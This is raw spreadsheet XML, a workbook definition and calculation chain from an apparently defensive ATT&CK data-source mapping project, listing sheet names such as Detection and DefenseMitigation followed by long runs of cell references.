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codeName="ThisWorkbook" defaultThemeVersion="166925"/>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice Requires="x15">
      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/olafhartong/tools/ATTACKdatamap/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{4BE3F400-6A83-4246-BE9D-565946BF2716}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="640" yWindow="460" windowWidth="40320" windowHeight="25140" tabRatio="748" activeTab="4" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="RatingLegend" sheetId="3" r:id="rId1"/>
    <sheet name="DataSourceEvents" sheetId="1" r:id="rId2"/>
    <sheet name="Detection" sheetId="9" r:id="rId3"/>
    <sheet name="DefenseMitigation" sheetId="10" r:id="rId4"/>
    <sheet name="TechniqueDataSourceWeights" sheetId="2" r:id="rId5"/>
    <sheet name="TechniqueDataSourceWeights (2)" sheetId="15" r:id="rId6"/>
    <sheet name="DefenseBypassWeights" sheetId="11" r:id="rId7"/>
    <sheet name="TechniqueApplication" sheetId="14" r:id="rId8"/>
    <sheet name="Knowledge base" sheetId="7" r:id="rId9"/>
    <sheet name="REF-DataSources" sheetId="5" r:id="rId10"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="6" hidden="1">DefenseBypassWeights!$A$2:$G$224</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="4" hidden="1">TechniqueDataSourceWeights!$A$2:$G$224</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="5" hidden="1">'TechniqueDataSourceWeights (2)'!$A$2:$G$224</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9" i="2" l="1"/>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3" i="2"/>
  <c r="G4" i="2"/>
  <c r="G5" i="2"/>
  <c r="G6" i="2"/>
  <c r="G7" i="2"/>
  <c r="G8" i="2"/>
  <c r="G9" i="2"/>
  <c r="G10" i="2"/>
  <c r="G11" i="2"/>
  <c r="G12" i="2"/>
  <c r="G13" i="2"/>
  <c r="G14" i="2"/>
  <c r="G15" i="2"/>
  <c r="G16" i="2"/>
  <c r="G17" i="2"/>
  <c r="G18" i="2"/>
  <c r="G19" i="2"/>
  <c r="G20" i="2"/>
  <c r="G21" i="2"/>
  <c r="G22" i="2"/>
  <c r="G23" i="2"/>
  <c r="G24" i="2"/>
  <c r="G25" i="2"/>
  <c r="G26" i="2"/>
  <c r="G27" i="2"/>
  <c r="G28" i="2"/>
  <c r="G2"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D6" i="2" l="1"/>
  <c r="E6" i="2"/>
  <c r="D7" i="2"/>
  <c r="E7" i="2"/>
  <c r="D8" i="2"/>
  <c r="E8" i="2"/>
  <c r="D9" i="2"/>
  <c r="E9" i="2"/>
  <c r="D10" i="2"/>
  <c r="E10" i="2"/>
  <c r="D11" i="2"/>
  <c r="E11" i="2"/>
  <c r="D12" i="2"/>
  <c r="E12" i="2"/>
  <c r="D13" i="2"/>
  <c r="E13" i="2"/>
  <c r="D14" i="2"/>
  <c r="E14" i="2"/>
  <c r="D15" i="2"/>
  <c r="E15" i="2"/>
  <c r="D16" i="2"/>
  <c r="E16" i="2"/>
  <c r="D17" i="2"/>
  <c r="E17" i="2"/>
  <c r="E268" i="2" l="1"/>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E267" i="15"/>
  <c r="B267" i="15"/>
  <c r="D267" i="15" s="1"/>
  <c r="E266" i="15"/>
  <c r="B266" i="15"/>
  <c r="D266" i="15" s="1"/>
  <c r="E265" i="15"/>
  <c r="B265" i="15"/>
  <c r="D265" i="15" s="1"/>
  <c r="E264" i="15"/>
  <c r="B264" i="15"/>
  <c r="D264" i="15" s="1"/>
  <c r="E263" i="15"/>
  <c r="B263" i="15"/>
  <c r="D263" i="15" s="1"/>
  <c r="E262" i="15"/>
  <c r="B262" i="15"/>
  <c r="D262" i="15" s="1"/>
  <c r="E261" i="15"/>
  <c r="B261" i="15"/>
  <c r="D261" i="15" s="1"/>
  <c r="E260" i="15"/>
  <c r="B260" i="15"/>
  <c r="D260" i="15" s="1"/>
  <c r="E259" i="15"/>
  <c r="B259" i="15"/>
  <c r="D259" i="15" s="1"/>
  <c r="E258" i="15"/>
  <c r="B258" i="15"/>
  <c r="D258" i="15" s="1"/>
  <c r="E257" i="15"/>
  <c r="B257" i="15"/>
  <c r="D257" i="15" s="1"/>
  <c r="E256" i="15"/>
  <c r="B256" i="15"/>
  <c r="D256" i="15" s="1"/>
  <c r="E255" i="15"/>
  <c r="B255" i="15"/>
  <c r="D255" i="15" s="1"/>
  <c r="E254" i="15"/>
  <c r="B254" i="15"/>
  <c r="D254" i="15" s="1"/>
  <c r="E253" i="15"/>
  <c r="B253" i="15"/>
  <c r="D253" i="15" s="1"/>
  <c r="E252" i="15"/>
  <c r="B252" i="15"/>
  <c r="D252" i="15" s="1"/>
  <c r="E251" i="15"/>
  <c r="B251" i="15"/>
  <c r="D251" i="15" s="1"/>
  <c r="E250" i="15"/>
  <c r="B250" i="15"/>
  <c r="D250" i="15" s="1"/>
  <c r="E249" i="15"/>
  <c r="B249" i="15"/>
  <c r="D249" i="15" s="1"/>
  <c r="E248" i="15"/>
  <c r="B248" i="15"/>
  <c r="D248" i="15" s="1"/>
  <c r="E247" i="15"/>
  <c r="B247" i="15"/>
  <c r="D247" i="15" s="1"/>
  <c r="E246" i="15"/>
  <c r="B246" i="15"/>
  <c r="D246" i="15" s="1"/>
  <c r="E245" i="15"/>
  <c r="B245" i="15"/>
  <c r="D245" i="15" s="1"/>
  <c r="E244" i="15"/>
  <c r="B244" i="15"/>
  <c r="D244" i="15" s="1"/>
  <c r="E243" i="15"/>
  <c r="B243" i="15"/>
  <c r="D243" i="15" s="1"/>
  <c r="E242" i="15"/>
  <c r="B242" i="15"/>
  <c r="D242" i="15" s="1"/>
  <c r="E241" i="15"/>
  <c r="B241" i="15"/>
  <c r="D241" i="15" s="1"/>
  <c r="E240" i="15"/>
  <c r="B240" i="15"/>
  <c r="D240" i="15" s="1"/>
  <c r="E239" i="15"/>
  <c r="B239" i="15"/>
  <c r="D239" i="15" s="1"/>
  <c r="E238" i="15"/>
  <c r="B238" i="15"/>
  <c r="D238" i="15" s="1"/>
  <c r="E237" i="15"/>
  <c r="B237" i="15"/>
  <c r="D237" i="15" s="1"/>
  <c r="E236" i="15"/>
  <c r="B236" i="15"/>
  <c r="D236" i="15" s="1"/>
  <c r="E235" i="15"/>
  <c r="B235" i="15"/>
  <c r="D235" i="15" s="1"/>
  <c r="E234" i="15"/>
  <c r="B234" i="15"/>
  <c r="D234" i="15" s="1"/>
  <c r="E233" i="15"/>
  <c r="B233" i="15"/>
  <c r="D233" i="15" s="1"/>
  <c r="E232" i="15"/>
  <c r="B232" i="15"/>
  <c r="D232" i="15" s="1"/>
  <c r="E231" i="15"/>
  <c r="B231" i="15"/>
  <c r="D231" i="15" s="1"/>
  <c r="E230" i="15"/>
  <c r="B230" i="15"/>
  <c r="D230" i="15" s="1"/>
  <c r="E229" i="15"/>
  <c r="B229" i="15"/>
  <c r="D229" i="15" s="1"/>
  <c r="E228" i="15"/>
  <c r="B228" i="15"/>
  <c r="D228" i="15" s="1"/>
  <c r="E227" i="15"/>
  <c r="B227" i="15"/>
  <c r="D227" i="15" s="1"/>
  <c r="E226" i="15"/>
  <c r="B226" i="15"/>
  <c r="D226" i="15" s="1"/>
  <c r="E225" i="15"/>
  <c r="B225" i="15"/>
  <c r="D225" i="15" s="1"/>
  <c r="E224" i="15"/>
  <c r="B224" i="15"/>
  <c r="D224" i="15" s="1"/>
  <c r="E223" i="15"/>
  <c r="B223" i="15"/>
  <c r="D223" i="15" s="1"/>
  <c r="E222" i="15"/>
  <c r="B222" i="15"/>
  <c r="D222" i="15" s="1"/>
  <c r="E221" i="15"/>
  <c r="B221" i="15"/>
  <c r="D221" i="15" s="1"/>
  <c r="E220" i="15"/>
  <c r="B220" i="15"/>
  <c r="D220" i="15" s="1"/>
  <c r="E219" i="15"/>
  <c r="B219" i="15"/>
  <c r="D219" i="15" s="1"/>
  <c r="E218" i="15"/>
  <c r="B218" i="15"/>
  <c r="D218" i="15" s="1"/>
  <c r="E217" i="15"/>
  <c r="B217" i="15"/>
  <c r="D217" i="15" s="1"/>
  <c r="E216" i="15"/>
  <c r="B216" i="15"/>
  <c r="D216" i="15" s="1"/>
  <c r="E215" i="15"/>
  <c r="B215" i="15"/>
  <c r="D215" i="15" s="1"/>
  <c r="E214" i="15"/>
  <c r="B214" i="15"/>
  <c r="D214" i="15" s="1"/>
  <c r="E213" i="15"/>
  <c r="B213" i="15"/>
  <c r="D213" i="15" s="1"/>
  <c r="E212" i="15"/>
  <c r="B212" i="15"/>
  <c r="D212" i="15" s="1"/>
  <c r="E211" i="15"/>
  <c r="B211" i="15"/>
  <c r="D211" i="15" s="1"/>
  <c r="E210" i="15"/>
  <c r="B210" i="15"/>
  <c r="D210" i="15" s="1"/>
  <c r="E209" i="15"/>
  <c r="B209" i="15"/>
  <c r="D209" i="15" s="1"/>
  <c r="E208" i="15"/>
  <c r="B208" i="15"/>
  <c r="D208" i="15" s="1"/>
  <c r="E207" i="15"/>
  <c r="B207" i="15"/>
  <c r="D207" i="15" s="1"/>
  <c r="E206" i="15"/>
  <c r="B206" i="15"/>
  <c r="D206" i="15" s="1"/>
  <c r="E205" i="15"/>
  <c r="B205" i="15"/>
  <c r="D205" i="15" s="1"/>
  <c r="E204" i="15"/>
  <c r="B204" i="15"/>
  <c r="D204" i="15" s="1"/>
  <c r="E203" i="15"/>
  <c r="B203" i="15"/>
  <c r="D203" i="15" s="1"/>
  <c r="E202" i="15"/>
  <c r="B202" i="15"/>
  <c r="D202" i="15" s="1"/>
  <c r="E201" i="15"/>
  <c r="B201" i="15"/>
  <c r="D201" i="15" s="1"/>
  <c r="E200" i="15"/>
  <c r="B200" i="15"/>
  <c r="D200" i="15" s="1"/>
  <c r="E199" i="15"/>
  <c r="B199" i="15"/>
  <c r="D199" i="15" s="1"/>
  <c r="E198" i="15"/>
  <c r="B198" i="15"/>
  <c r="D198" i="15" s="1"/>
  <c r="E197" i="15"/>
  <c r="B197" i="15"/>
  <c r="D197" i="15" s="1"/>
  <c r="E196" i="15"/>
  <c r="B196" i="15"/>
  <c r="D196" i="15" s="1"/>
  <c r="E195" i="15"/>
  <c r="B195" i="15"/>
  <c r="D195" i="15" s="1"/>
  <c r="E194" i="15"/>
  <c r="B194" i="15"/>
  <c r="D194" i="15" s="1"/>
  <c r="E193" i="15"/>
  <c r="B193" i="15"/>
  <c r="D193" i="15" s="1"/>
  <c r="E192" i="15"/>
  <c r="B192" i="15"/>
  <c r="D192" i="15" s="1"/>
  <c r="E191" i="15"/>
  <c r="B191" i="15"/>
  <c r="D191" i="15" s="1"/>
  <c r="E190" i="15"/>
  <c r="B190" i="15"/>
  <c r="D190" i="15" s="1"/>
  <c r="E189" i="15"/>
  <c r="B189" i="15"/>
  <c r="D189" i="15" s="1"/>
  <c r="E188" i="15"/>
  <c r="B188" i="15"/>
  <c r="D188" i="15" s="1"/>
  <c r="E187" i="15"/>
  <c r="B187" i="15"/>
  <c r="D187" i="15" s="1"/>
  <c r="E186" i="15"/>
  <c r="B186" i="15"/>
  <c r="D186" i="15" s="1"/>
  <c r="E185" i="15"/>
  <c r="B185" i="15"/>
  <c r="D185" i="15" s="1"/>
  <c r="E184" i="15"/>
  <c r="B184" i="15"/>
  <c r="D184" i="15" s="1"/>
  <c r="E183" i="15"/>
  <c r="B183" i="15"/>
  <c r="D183" i="15" s="1"/>
  <c r="E182" i="15"/>
  <c r="B182" i="15"/>
  <c r="D182" i="15" s="1"/>
  <c r="E181" i="15"/>
  <c r="B181" i="15"/>
  <c r="D181" i="15" s="1"/>
  <c r="E180" i="15"/>
  <c r="B180" i="15"/>
  <c r="D180" i="15" s="1"/>
  <c r="E179" i="15"/>
  <c r="B179" i="15"/>
  <c r="D179" i="15" s="1"/>
  <c r="E178" i="15"/>
  <c r="B178" i="15"/>
  <c r="D178" i="15" s="1"/>
  <c r="E177" i="15"/>
  <c r="B177" i="15"/>
  <c r="D177" i="15" s="1"/>
  <c r="E176" i="15"/>
  <c r="B176" i="15"/>
  <c r="D176" i="15" s="1"/>
  <c r="E175" i="15"/>
  <c r="B175" i="15"/>
  <c r="D175" i="15" s="1"/>
  <c r="E174" i="15"/>
  <c r="B174" i="15"/>
  <c r="D174" i="15" s="1"/>
  <c r="E173" i="15"/>
  <c r="B173" i="15"/>
  <c r="D173" i="15" s="1"/>
  <c r="E172" i="15"/>
  <c r="B172" i="15"/>
  <c r="D172" i="15" s="1"/>
  <c r="E171" i="15"/>
  <c r="B171" i="15"/>
  <c r="D171" i="15" s="1"/>
  <c r="E170" i="15"/>
  <c r="B170" i="15"/>
  <c r="D170" i="15" s="1"/>
  <c r="E169" i="15"/>
  <c r="B169" i="15"/>
  <c r="D169" i="15" s="1"/>
  <c r="E168" i="15"/>
  <c r="B168" i="15"/>
  <c r="D168" i="15" s="1"/>
  <c r="E167" i="15"/>
  <c r="B167" i="15"/>
  <c r="D167" i="15" s="1"/>
  <c r="E166" i="15"/>
  <c r="B166" i="15"/>
  <c r="D166" i="15" s="1"/>
  <c r="E165" i="15"/>
  <c r="B165" i="15"/>
  <c r="D165" i="15" s="1"/>
  <c r="E164" i="15"/>
  <c r="B164" i="15"/>
  <c r="D164" i="15" s="1"/>
  <c r="E163" i="15"/>
  <c r="B163" i="15"/>
  <c r="D163" i="15" s="1"/>
  <c r="E162" i="15"/>
  <c r="B162" i="15"/>
  <c r="D162" i="15" s="1"/>
  <c r="E161" i="15"/>
  <c r="B161" i="15"/>
  <c r="D161" i="15" s="1"/>
  <c r="E160" i="15"/>
  <c r="B160" i="15"/>
  <c r="D160" i="15" s="1"/>
  <c r="E159" i="15"/>
  <c r="B159" i="15"/>
  <c r="D159" i="15" s="1"/>
  <c r="E158" i="15"/>
  <c r="B158" i="15"/>
  <c r="D158" i="15" s="1"/>
  <c r="E157" i="15"/>
  <c r="B157" i="15"/>
  <c r="D157" i="15" s="1"/>
  <c r="E156" i="15"/>
  <c r="B156" i="15"/>
  <c r="D156" i="15" s="1"/>
  <c r="E155" i="15"/>
  <c r="B155" i="15"/>
  <c r="D155" i="15" s="1"/>
  <c r="E154" i="15"/>
  <c r="B154" i="15"/>
  <c r="D154" i="15" s="1"/>
  <c r="E153" i="15"/>
  <c r="B153" i="15"/>
  <c r="D153" i="15" s="1"/>
  <c r="E152" i="15"/>
  <c r="B152" i="15"/>
  <c r="D152" i="15" s="1"/>
  <c r="E151" i="15"/>
  <c r="B151" i="15"/>
  <c r="D151" i="15" s="1"/>
  <c r="E150" i="15"/>
  <c r="B150" i="15"/>
  <c r="D150" i="15" s="1"/>
  <c r="E149" i="15"/>
  <c r="B149" i="15"/>
  <c r="D149" i="15" s="1"/>
  <c r="E148" i="15"/>
  <c r="B148" i="15"/>
  <c r="D148" i="15" s="1"/>
  <c r="E147" i="15"/>
  <c r="B147" i="15"/>
  <c r="D147" i="15" s="1"/>
  <c r="E146" i="15"/>
  <c r="B146" i="15"/>
  <c r="D146" i="15" s="1"/>
  <c r="E145" i="15"/>
  <c r="B145" i="15"/>
  <c r="D145" i="15" s="1"/>
  <c r="E144" i="15"/>
  <c r="B144" i="15"/>
  <c r="D144" i="15" s="1"/>
  <c r="E143" i="15"/>
  <c r="B143" i="15"/>
  <c r="D143" i="15" s="1"/>
  <c r="E142" i="15"/>
  <c r="B142" i="15"/>
  <c r="D142" i="15" s="1"/>
  <c r="E141" i="15"/>
  <c r="B141" i="15"/>
  <c r="D141" i="15" s="1"/>
  <c r="E140" i="15"/>
  <c r="B140" i="15"/>
  <c r="D140" i="15" s="1"/>
  <c r="E139" i="15"/>
  <c r="B139" i="15"/>
  <c r="D139" i="15" s="1"/>
  <c r="E138" i="15"/>
  <c r="B138" i="15"/>
  <c r="D138" i="15" s="1"/>
  <c r="E137" i="15"/>
  <c r="B137" i="15"/>
  <c r="D137" i="15" s="1"/>
  <c r="E136" i="15"/>
  <c r="B136" i="15"/>
  <c r="D136" i="15" s="1"/>
  <c r="E135" i="15"/>
  <c r="B135" i="15"/>
  <c r="D135" i="15" s="1"/>
  <c r="E134" i="15"/>
  <c r="B134" i="15"/>
  <c r="D134" i="15" s="1"/>
  <c r="E133" i="15"/>
  <c r="B133" i="15"/>
  <c r="D133" i="15" s="1"/>
  <c r="E132" i="15"/>
  <c r="B132" i="15"/>
  <c r="D132" i="15" s="1"/>
  <c r="E131" i="15"/>
  <c r="B131" i="15"/>
  <c r="D131" i="15" s="1"/>
  <c r="E130" i="15"/>
  <c r="B130" i="15"/>
  <c r="D130" i="15" s="1"/>
  <c r="E129" i="15"/>
  <c r="B129" i="15"/>
  <c r="D129" i="15" s="1"/>
  <c r="E128" i="15"/>
  <c r="B128" i="15"/>
  <c r="D128" i="15" s="1"/>
  <c r="E127" i="15"/>
  <c r="B127" i="15"/>
  <c r="D127" i="15" s="1"/>
  <c r="E126" i="15"/>
  <c r="B126" i="15"/>
  <c r="D126" i="15" s="1"/>
  <c r="E125" i="15"/>
  <c r="B125" i="15"/>
  <c r="D125" i="15" s="1"/>
  <c r="E124" i="15"/>
  <c r="B124" i="15"/>
  <c r="D124" i="15" s="1"/>
  <c r="E123" i="15"/>
  <c r="B123" i="15"/>
  <c r="D123" i="15" s="1"/>
  <c r="E122" i="15"/>
  <c r="B122" i="15"/>
  <c r="D122" i="15" s="1"/>
  <c r="E121" i="15"/>
  <c r="B121" i="15"/>
  <c r="D121" i="15" s="1"/>
  <c r="E120" i="15"/>
  <c r="B120" i="15"/>
  <c r="D120" i="15" s="1"/>
  <c r="E119" i="15"/>
  <c r="B119" i="15"/>
  <c r="D119" i="15" s="1"/>
  <c r="E118" i="15"/>
  <c r="B118" i="15"/>
  <c r="D118" i="15" s="1"/>
  <c r="E117" i="15"/>
  <c r="B117" i="15"/>
  <c r="D117" i="15" s="1"/>
  <c r="E116" i="15"/>
  <c r="B116" i="15"/>
  <c r="D116" i="15" s="1"/>
  <c r="E115" i="15"/>
  <c r="B115" i="15"/>
  <c r="D115" i="15" s="1"/>
  <c r="E114" i="15"/>
  <c r="B114" i="15"/>
  <c r="D114" i="15" s="1"/>
  <c r="E113" i="15"/>
  <c r="B113" i="15"/>
  <c r="D113" i="15" s="1"/>
  <c r="E112" i="15"/>
  <c r="B112" i="15"/>
  <c r="D112" i="15" s="1"/>
  <c r="E111" i="15"/>
  <c r="B111" i="15"/>
  <c r="D111" i="15" s="1"/>
  <c r="E110" i="15"/>
  <c r="B110" i="15"/>
  <c r="D110" i="15" s="1"/>
  <c r="E109" i="15"/>
  <c r="B109" i="15"/>
  <c r="D109" i="15" s="1"/>
  <c r="E108" i="15"/>
  <c r="B108" i="15"/>
  <c r="D108" i="15" s="1"/>
  <c r="E107" i="15"/>
  <c r="B107" i="15"/>
  <c r="D107" i="15" s="1"/>
  <c r="E106" i="15"/>
  <c r="B106" i="15"/>
  <c r="D106" i="15" s="1"/>
  <c r="E105" i="15"/>
  <c r="B105" i="15"/>
  <c r="D105" i="15" s="1"/>
  <c r="E104" i="15"/>
  <c r="B104" i="15"/>
  <c r="D104" i="15" s="1"/>
  <c r="E103" i="15"/>
  <c r="B103" i="15"/>
  <c r="D103" i="15" s="1"/>
  <c r="E102" i="15"/>
  <c r="B102" i="15"/>
  <c r="D102" i="15" s="1"/>
  <c r="E101" i="15"/>
  <c r="B101" i="15"/>
  <c r="D101" i="15" s="1"/>
  <c r="E100" i="15"/>
  <c r="B100" i="15"/>
  <c r="D100" i="15" s="1"/>
  <c r="E99" i="15"/>
  <c r="B99" i="15"/>
  <c r="D99" i="15" s="1"/>
  <c r="E98" i="15"/>
  <c r="B98" i="15"/>
  <c r="D98" i="15" s="1"/>
  <c r="E97" i="15"/>
  <c r="B97" i="15"/>
  <c r="D97" i="15" s="1"/>
  <c r="E96" i="15"/>
  <c r="B96" i="15"/>
  <c r="D96" i="15" s="1"/>
  <c r="E95" i="15"/>
  <c r="B95" i="15"/>
  <c r="D95" i="15" s="1"/>
  <c r="E94" i="15"/>
  <c r="B94" i="15"/>
  <c r="D94" i="15" s="1"/>
  <c r="E93" i="15"/>
  <c r="B93" i="15"/>
  <c r="D93" i="15" s="1"/>
  <c r="E92" i="15"/>
  <c r="B92" i="15"/>
  <c r="D92" i="15" s="1"/>
  <c r="E91" i="15"/>
  <c r="B91" i="15"/>
  <c r="D91" i="15" s="1"/>
  <c r="E90" i="15"/>
  <c r="B90" i="15"/>
  <c r="D90" i="15" s="1"/>
  <c r="E89" i="15"/>
  <c r="B89" i="15"/>
  <c r="D89" i="15" s="1"/>
  <c r="E88" i="15"/>
  <c r="B88" i="15"/>
  <c r="D88" i="15" s="1"/>
  <c r="E87" i="15"/>
  <c r="B87" i="15"/>
  <c r="D87" i="15" s="1"/>
  <c r="E86" i="15"/>
  <c r="B86" i="15"/>
  <c r="D86" i="15" s="1"/>
  <c r="E85" i="15"/>
  <c r="B85" i="15"/>
  <c r="D85" i="15" s="1"/>
  <c r="E84" i="15"/>
  <c r="B84" i="15"/>
  <c r="D84" i="15" s="1"/>
  <c r="E83" i="15"/>
  <c r="B83" i="15"/>
  <c r="D83" i="15" s="1"/>
  <c r="E82" i="15"/>
  <c r="B82" i="15"/>
  <c r="D82" i="15" s="1"/>
  <c r="E81" i="15"/>
  <c r="B81" i="15"/>
  <c r="D81" i="15" s="1"/>
  <c r="E80" i="15"/>
  <c r="B80" i="15"/>
  <c r="D80" i="15" s="1"/>
  <c r="E79" i="15"/>
  <c r="B79" i="15"/>
  <c r="D79" i="15" s="1"/>
  <c r="E78" i="15"/>
  <c r="B78" i="15"/>
  <c r="D78" i="15" s="1"/>
  <c r="E77" i="15"/>
  <c r="B77" i="15"/>
  <c r="D77" i="15" s="1"/>
  <c r="E76" i="15"/>
  <c r="B76" i="15"/>
  <c r="D76" i="15" s="1"/>
  <c r="E75" i="15"/>
  <c r="B75" i="15"/>
  <c r="D75" i="15" s="1"/>
  <c r="E74" i="15"/>
  <c r="B74" i="15"/>
  <c r="D74" i="15" s="1"/>
  <c r="E73" i="15"/>
  <c r="B73" i="15"/>
  <c r="D73" i="15" s="1"/>
  <c r="E72" i="15"/>
  <c r="B72" i="15"/>
  <c r="D72" i="15" s="1"/>
  <c r="E71" i="15"/>
  <c r="B71" i="15"/>
  <c r="D71" i="15" s="1"/>
  <c r="E70" i="15"/>
  <c r="B70" i="15"/>
  <c r="D70" i="15" s="1"/>
  <c r="E69" i="15"/>
  <c r="B69" i="15"/>
  <c r="D69" i="15" s="1"/>
  <c r="E68" i="15"/>
  <c r="B68" i="15"/>
  <c r="D68" i="15" s="1"/>
  <c r="E67" i="15"/>
  <c r="B67" i="15"/>
  <c r="D67" i="15" s="1"/>
  <c r="E66" i="15"/>
  <c r="B66" i="15"/>
  <c r="D66" i="15" s="1"/>
  <c r="E65" i="15"/>
  <c r="B65" i="15"/>
  <c r="D65" i="15" s="1"/>
  <c r="E64" i="15"/>
  <c r="B64" i="15"/>
  <c r="D64" i="15" s="1"/>
  <c r="E63" i="15"/>
  <c r="B63" i="15"/>
  <c r="D63" i="15" s="1"/>
  <c r="E62" i="15"/>
  <c r="B62" i="15"/>
  <c r="D62" i="15" s="1"/>
  <c r="E61" i="15"/>
  <c r="B61" i="15"/>
  <c r="D61" i="15" s="1"/>
  <c r="E60" i="15"/>
  <c r="B60" i="15"/>
  <c r="D60" i="15" s="1"/>
  <c r="E59" i="15"/>
  <c r="B59" i="15"/>
  <c r="D59" i="15" s="1"/>
  <c r="E58" i="15"/>
  <c r="B58" i="15"/>
  <c r="D58" i="15" s="1"/>
  <c r="E57" i="15"/>
  <c r="B57" i="15"/>
  <c r="D57" i="15" s="1"/>
  <c r="E56" i="15"/>
  <c r="B56" i="15"/>
  <c r="D56" i="15" s="1"/>
  <c r="E55" i="15"/>
  <c r="B55" i="15"/>
  <c r="D55" i="15" s="1"/>
  <c r="E54" i="15"/>
  <c r="B54" i="15"/>
  <c r="D54" i="15" s="1"/>
  <c r="E53" i="15"/>
  <c r="B53" i="15"/>
  <c r="D53" i="15" s="1"/>
  <c r="E52" i="15"/>
  <c r="B52" i="15"/>
  <c r="D52" i="15" s="1"/>
  <c r="E51" i="15"/>
  <c r="B51" i="15"/>
  <c r="D51" i="15" s="1"/>
  <c r="E50" i="15"/>
  <c r="B50" i="15"/>
  <c r="D50" i="15" s="1"/>
  <c r="E49" i="15"/>
  <c r="B49" i="15"/>
  <c r="D49" i="15" s="1"/>
  <c r="E48" i="15"/>
  <c r="B48" i="15"/>
  <c r="D48" i="15" s="1"/>
  <c r="E47" i="15"/>
  <c r="B47" i="15"/>
  <c r="D47" i="15" s="1"/>
  <c r="E46" i="15"/>
  <c r="B46" i="15"/>
  <c r="D46" i="15" s="1"/>
  <c r="E45" i="15"/>
  <c r="B45" i="15"/>
  <c r="D45" i="15" s="1"/>
  <c r="E44" i="15"/>
  <c r="B44" i="15"/>
  <c r="D44" i="15" s="1"/>
  <c r="E43" i="15"/>
  <c r="B43" i="15"/>
  <c r="D43" i="15" s="1"/>
  <c r="E42" i="15"/>
  <c r="B42" i="15"/>
  <c r="D42" i="15" s="1"/>
  <c r="E41" i="15"/>
  <c r="B41" i="15"/>
  <c r="D41" i="15" s="1"/>
  <c r="E40" i="15"/>
  <c r="B40" i="15"/>
  <c r="D40" i="15" s="1"/>
  <c r="E39" i="15"/>
  <c r="B39" i="15"/>
  <c r="D39" i="15" s="1"/>
  <c r="E38" i="15"/>
  <c r="B38" i="15"/>
  <c r="D38" i="15" s="1"/>
  <c r="E37" i="15"/>
  <c r="B37" i="15"/>
  <c r="D37" i="15" s="1"/>
  <c r="E36" i="15"/>
  <c r="B36" i="15"/>
  <c r="D36" i="15" s="1"/>
  <c r="E35" i="15"/>
  <c r="B35" i="15"/>
  <c r="D35" i="15" s="1"/>
  <c r="E34" i="15"/>
  <c r="B34" i="15"/>
  <c r="D34" i="15" s="1"/>
  <c r="E33" i="15"/>
  <c r="B33" i="15"/>
  <c r="D33" i="15" s="1"/>
  <c r="E32" i="15"/>
  <c r="B32" i="15"/>
  <c r="D32" i="15" s="1"/>
  <c r="E31" i="15"/>
  <c r="B31" i="15"/>
  <c r="D31" i="15" s="1"/>
  <c r="E30" i="15"/>
  <c r="B30" i="15"/>
  <c r="D30" i="15" s="1"/>
  <c r="E29" i="15"/>
  <c r="B29" i="15"/>
  <c r="D29" i="15" s="1"/>
  <c r="E28" i="15"/>
  <c r="B28" i="15"/>
  <c r="D28" i="15" s="1"/>
  <c r="E27" i="15"/>
  <c r="B27" i="15"/>
  <c r="D27" i="15" s="1"/>
  <c r="E26" i="15"/>
  <c r="B26" i="15"/>
  <c r="D26" i="15" s="1"/>
  <c r="E25" i="15"/>
  <c r="B25" i="15"/>
  <c r="D25" i="15" s="1"/>
  <c r="E24" i="15"/>
  <c r="B24" i="15"/>
  <c r="D24" i="15" s="1"/>
  <c r="E23" i="15"/>
  <c r="B23" i="15"/>
  <c r="D23" i="15" s="1"/>
  <c r="E22" i="15"/>
  <c r="B22" i="15"/>
  <c r="D22" i="15" s="1"/>
  <c r="E21" i="15"/>
  <c r="B21" i="15"/>
  <c r="D21" i="15" s="1"/>
  <c r="E20" i="15"/>
  <c r="B20" i="15"/>
  <c r="D20" i="15" s="1"/>
  <c r="E19" i="15"/>
  <c r="B19" i="15"/>
  <c r="D19" i="15" s="1"/>
  <c r="E18" i="15"/>
  <c r="B18" i="15"/>
  <c r="D18" i="15" s="1"/>
  <c r="E17" i="15"/>
  <c r="B17" i="15"/>
  <c r="D17" i="15" s="1"/>
  <c r="E16" i="15"/>
  <c r="B16" i="15"/>
  <c r="D16" i="15" s="1"/>
  <c r="E15" i="15"/>
  <c r="B15" i="15"/>
  <c r="D15" i="15" s="1"/>
  <c r="E14" i="15"/>
  <c r="B14" i="15"/>
  <c r="D14" i="15" s="1"/>
  <c r="E13" i="15"/>
  <c r="B13" i="15"/>
  <c r="D13" i="15" s="1"/>
  <c r="E12" i="15"/>
  <c r="B12" i="15"/>
  <c r="D12" i="15" s="1"/>
  <c r="E11" i="15"/>
  <c r="B11" i="15"/>
  <c r="D11" i="15" s="1"/>
  <c r="E10" i="15"/>
  <c r="B10" i="15"/>
  <c r="D10" i="15" s="1"/>
  <c r="E9" i="15"/>
  <c r="B9" i="15"/>
  <c r="D9" i="15" s="1"/>
  <c r="E8" i="15"/>
  <c r="B8" i="15"/>
  <c r="D8" i="15" s="1"/>
  <c r="E7" i="15"/>
  <c r="B7" i="15"/>
  <c r="D7" i="15" s="1"/>
  <c r="E6" i="15"/>
  <c r="B6" i="15"/>
  <c r="D6" i="15" s="1"/>
  <c r="E5" i="15"/>
  <c r="B5" i="15"/>
  <c r="D5" i="15" s="1"/>
  <c r="E4" i="15"/>
  <c r="B4" i="15"/>
  <c r="D4" i="15" s="1"/>
  <c r="E3" i="15"/>
  <c r="B3" i="15"/>
  <c r="D3" i="15" s="1"/>
  <c r="G2" i="15"/>
  <c r="E2" i="15"/>
  <c r="D2" i="15"/>
  <c r="B2" i="15"/>
  <c r="G267" i="14" l="1"/>
  <c r="B267" i="14"/>
  <c r="G266" i="14"/>
  <c r="B266" i="14"/>
  <c r="G265" i="14"/>
  <c r="B265" i="14"/>
  <c r="G264" i="14"/>
  <c r="B264" i="14"/>
  <c r="G263" i="14"/>
  <c r="B263" i="14"/>
  <c r="G262" i="14"/>
  <c r="B262" i="14"/>
